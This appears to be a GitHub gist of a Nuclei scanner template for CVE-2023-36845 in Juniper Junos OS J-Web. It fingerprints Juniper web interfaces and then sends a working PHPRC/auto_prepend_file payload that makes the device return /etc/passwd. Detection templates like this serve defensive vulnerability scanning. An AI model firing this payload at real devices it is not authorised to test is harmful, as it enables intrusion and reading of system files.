Skip to content

Instantly share code, notes, and snippets.

@hxlxmjxbbxs
Created September 20, 2023 04:15
Show Gist options
  • Save hxlxmjxbbxs/6559f90f5cf2dc87565b654141411a54 to your computer and use it in GitHub Desktop.
Save hxlxmjxbbxs/6559f90f5cf2dc87565b654141411a54 to your computer and use it in GitHub Desktop.
Nuclei Template For Juniper Networks Junos OS PHP External Variable Modification Vulnerability
id: CVE-2023-36845
info:
name: Juniper Networks Junos OS PHP External Variable Modification Vulnerability
author: hxlxmj
severity: medium
description: |
A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-36845
- https://vulncheck.com/blog/juniper-cve-2023-36845
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36845
requests:
- method: GET
path:
- "{{BaseURL}}/"
matchers-condition: and
matchers:
- type: word
words:
- "Juniper Networks VPN Client Application</title>"
- "Juniper Networks Web Management</title>"
- "Juniper Networks Web Authentication</title>"
- "Juniper Web Device Manager</title>"
part: body
- type: status
status:
- 200
- method: POST
path:
- "{{BaseURL}}/?PHPRC=/dev/fd/0"
body: "auto_prepend_file=\"/etc/passwd\""
headers:
Content-Type: "application/x-www-form-urlencoded"
matchers-condition: and
matchers:
- type: word
words:
- "root:*:"
part: body
- type: status
status:
- 200
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment